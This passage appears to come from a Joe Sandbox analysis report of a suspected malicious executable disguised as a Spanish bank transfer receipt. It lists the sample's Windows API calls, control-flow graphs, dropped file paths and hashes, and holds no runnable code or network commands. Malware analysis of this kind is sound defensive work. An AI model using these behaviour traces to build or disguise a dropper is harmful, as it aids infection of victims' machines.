                                            • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                              • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040548D
                                            • ShowWindow.USER32(00000000), ref: 004054B1
                                            • ShowWindow.USER32(?,00000008), ref: 004054B6
                                            • ShowWindow.USER32(00000008), ref: 00405500
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                            • CreatePopupMenu.USER32 ref: 00405545
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                            • GetWindowRect.USER32(?,?), ref: 00405579
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                            • OpenClipboard.USER32(00000000), ref: 004055DA
                                            • EmptyClipboard.USER32 ref: 004055E0
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                            • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                            • CloseClipboard.USER32 ref: 0040563B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                            • String ID: {$|w$&B
                                            • API String ID: 4154960007-1835816524
                                            • Opcode ID: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                            • Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
                                            • Opcode Fuzzy Hash: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                            • Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 489 40580b-405831 call 405ad6 492 405833-405845 DeleteFileW 489->492 493 40584a-405851 489->493 494 4059c7-4059cb 492->494 495 405853-405855 493->495 496 405864-405874 call 40601a 493->496 497 405975-40597a 495->497 498 40585b-40585e 495->498 504 405883-405884 call 405a1a 496->504 505 405876-405881 lstrcatW 496->505 497->494 500 40597c-40597f 497->500 498->496 498->497 502 405981-405987 500->502 503 405989-405991 call 40635d 500->503 502->494 503->494 513 405993-4059a7 call 4059ce call 4057c3 503->513 508 405889-40588d 504->508 505->508 509 405899-40589f lstrcatW 508->509 510 40588f-405897 508->510 512 4058a4-4058c0 lstrlenW FindFirstFileW 509->512 510->509 510->512 514 4058c6-4058ce 512->514 515 40596a-40596e 512->515 529 4059a9-4059ac 513->529 530 4059bf-4059c2 call 405179 513->530 517 4058d0-4058d8 514->517 518 4058ee-405902 call 40601a 514->518 515->497 520 405970 515->520 521 4058da-4058e2 517->521 522 40594d-40595d FindNextFileW 517->522 531 405904-40590c 518->531 532 405919-405924 call 4057c3 518->532 520->497 521->518 525 4058e4-4058ec 521->525 522->514 528 405963-405964 FindClose 522->528 525->518 525->522 528->515 529->502 535 4059ae-4059bd call 405179 call 405ebb 529->535 530->494 531->522 536 40590e-405917 call 40580b 531->536 540 405945-405948 call 405179 532->540 541 405926-405929 532->541 535->494 536->522 540->522 544 40592b-40593b call 405179 call 405ebb 541->544 545 40593d-405943 541->545 544->522 545->522
                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                            • lstrcatW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,\*.*), ref: 0040587C
                                            • lstrcatW.KERNEL32(?,00409014), ref: 0040589F
                                            • lstrlenW.KERNEL32(?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
                                            • FindFirstFileW.KERNELBASE(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                            • FindClose.KERNEL32(00000000), ref: 00405964
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                            • API String ID: 2035342205-893253288
                                            • Opcode ID: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                            • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                            • Opcode Fuzzy Hash: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                            • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 633 405648-405693 CreateDirectoryW 634 405695-405697 633->634 635 405699-4056a6 GetLastError 633->635 636 4056c0-4056c2 634->636 635->636 637 4056a8-4056bc SetFileSecurityW 635->637 637->634 638 4056be GetLastError 637->638 638->636
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                            • GetLastError.KERNEL32 ref: 0040569F
                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                            • GetLastError.KERNEL32 ref: 004056BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
                                            • API String ID: 3449924974-2404651315
                                            • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                            • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                            • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                            • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FindFirstFileW.KERNELBASE(76BF3420,00425738,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00405B1F,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,76BF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                            • FindClose.KERNEL32(00000000), ref: 00406374
                                            Strings
                                            • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 0040635D
                                            • 8WB, xrefs: 0040635E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: 8WB$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                            • API String ID: 2295610775-1340106231
                                            • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                            • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                            • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                            • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                            • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                            • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                            • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                            • Instruction ID: 35ddb734ec7d865f8f709f830fd12decc1a753c42de70ab183506872ff8e9077
                                            • Opcode Fuzzy Hash: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                            • Instruction Fuzzy Hash: 0DF08271A00114DBC711EFA4DD49AAEB374FF44324F20457BF115F21E1D7B899409B29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 184 403c06-403c18 185 403d59-403d68 184->185 186 403c1e-403c24 184->186 188 403db7-403dcc 185->188 189 403d6a-403db2 GetDlgItem * 2 call 4040de SetClassLongW call 40140b 185->189 186->185 187 403c2a-403c33 186->187 190 403c35-403c42 SetWindowPos 187->190 191 403c48-403c4b 187->191 193 403e0c-403e11 call 40412a 188->193 194 403dce-403dd1 188->194 189->188 190->191 196 403c65-403c6b 191->196 197 403c4d-403c5f ShowWindow 191->197 202 403e16-403e31 193->202 199 403dd3-403dde call 401389 194->199 200 403e04-403e06 194->200 203 403c87-403c8a 196->203 204 403c6d-403c82 DestroyWindow 196->204 197->196 199->200 221 403de0-403dff SendMessageW 199->221 200->193 201 4040ab 200->201 209 4040ad-4040b4 201->209 207 403e33-403e35 call 40140b 202->207 208 403e3a-403e40 202->208 212 403c8c-403c98 SetWindowLongW 203->212 213 403c9d-403ca3 203->213 210 404088-40408e 204->210 207->208 217 403e46-403e51 208->217 218 404069-404082 DestroyWindow EndDialog 208->218 210->201 215 404090-404096 210->215 212->209 219 403d46-403d54 call 404145 213->219 220 403ca9-403cba GetDlgItem 213->220 215->201 223 404098-4040a1 ShowWindow 215->223 217->218 224 403e57-403ea4 call 40603c call 4040de * 3 GetDlgItem 217->224 218->210 219->209 225 403cd9-403cdc 220->225 226 403cbc-403cd3 SendMessageW IsWindowEnabled 220->226 221->209 223->201 254 403ea6-403eab 224->254 255 403eae-403eea ShowWindow KiUserCallbackDispatcher call 404100 EnableWindow 224->255 229 403ce1-403ce4 225->229 230 403cde-403cdf 225->230 226->201 226->225 232 403cf2-403cf7 229->232 233 403ce6-403cec 229->233 231 403d0f-403d14 call 4040b7 230->231 231->219 235 403d2d-403d40 SendMessageW 232->235 237 403cf9-403cff 232->237 233->235 236 403cee-403cf0 233->236 235->219 236->231 240 403d01-403d07 call 40140b 237->240 241 403d16-403d1f call 40140b 237->241 250 403d0d 240->250 241->219 251 403d21-403d2b 241->251 250->231 251->250 254->255 258 403eec-403eed 255->258 259 403eef 255->259 260 403ef1-403f1f GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f21-403f32 SendMessageW 260->261 262 403f34 260->262 263 403f3a-403f78 call 404113 call 40601a lstrlenW call 40603c SetWindowTextW call 401389 261->263 262->263 263->202 272 403f7e-403f80 263->272 272->202 273 403f86-403f8a 272->273 274 403fa9-403fbd DestroyWindow 273->274 275 403f8c-403f92 273->275 274->210 277 403fc3-403ff0 CreateDialogParamW 274->277 275->201 276 403f98-403f9e 275->276 276->202 278 403fa4 276->278 277->210 279 403ff6-40404d call 4040de GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->201 279->201 284 40404f-404062 ShowWindow call 40412a 279->284 286 404067 284->286 286->210
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                            • ShowWindow.USER32(?), ref: 00403C5F
                                            • DestroyWindow.USER32 ref: 00403C73
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                            • GetDlgItem.USER32(?,?), ref: 00403CB0
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                            • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                            • GetDlgItem.USER32(?,?), ref: 00403D79
                                            • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403DEE
                                            • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                            • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
                                            • EnableWindow.USER32(?,?), ref: 00403EE2
                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403EF8
                                            • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F17
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                            • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                            • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                            • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID: |w$&B
                                            • API String ID: 3282139019-1335198338
                                            • Opcode ID: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                            • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                            • Opcode Fuzzy Hash: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                            • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 287 403863-40387b call 4063f4 290 40387d-403888 GetUserDefaultUILanguage call 405f61 287->290 291 40388f-4038c6 call 405ee7 287->291 294 40388d 290->294 297 4038c8-4038d9 call 405ee7 291->297 298 4038de-4038e4 lstrcatW 291->298 296 4038e9-403912 call 403b39 call 405ad6 294->296 304 4039a4-4039ac call 405ad6 296->304 305 403918-40391d 296->305 297->298 298->296 310 4039ba-4039df LoadImageW 304->310 311 4039ae-4039b5 call 40603c 304->311 305->304 306 403923-40393d call 405ee7 305->306 312 403942-40394b 306->312 315 403a60-403a68 call 40140b 310->315 316 4039e1-403a11 RegisterClassW 310->316 311->310 312->304 313 40394d-403951 312->313 317 403963-40396f lstrlenW 313->317 318 403953-403960 call 4059fb 313->318 329 403a72-403a7d call 403b39 315->329 330 403a6a-403a6d 315->330 319 403a17-403a5b SystemParametersInfoW CreateWindowExW 316->319 320 403b2f 316->320 324 403971-40397f lstrcmpiW 317->324 325 403997-40399f call 4059ce call 40601a 317->325 318->317 319->315 323 403b31-403b38 320->323 324->325 328 403981-40398b GetFileAttributesW 324->328 325->304 332 403991-403992 call 405a1a 328->332 333 40398d-40398f 328->333 339 403a83-403a9d ShowWindow call 406384 329->339 340 403b06-403b07 call 40524c 329->340 330->323 332->325 333->325 333->332 345 403aa9-403abb GetClassInfoW 339->345 346 403a9f-403aa4 call 406384 339->346 343 403b0c-403b0e 340->343 347 403b10-403b16 343->347 348 403b28-403b2a call 40140b 343->348 351 403ad3-403af6 DialogBoxParamW call 40140b 345->351 352 403abd-403acd GetClassInfoW RegisterClassW 345->352 346->345 347->330 353 403b1c-403b23 call 40140b 347->353 348->320 356 403afb-403b04 call 4037b3 351->356 352->351 353->330 356->323
                                            APIs
                                              • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                              • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00000000), ref: 0040387D
                                              • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                            • lstrcatW.KERNEL32(1033,004226E8), ref: 004038E4
                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,76BF3420), ref: 00403964
                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403982
                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven), ref: 004039CB
                                            • RegisterClassW.USER32(004281A0), ref: 00403A08
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                            • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                            • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                            • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
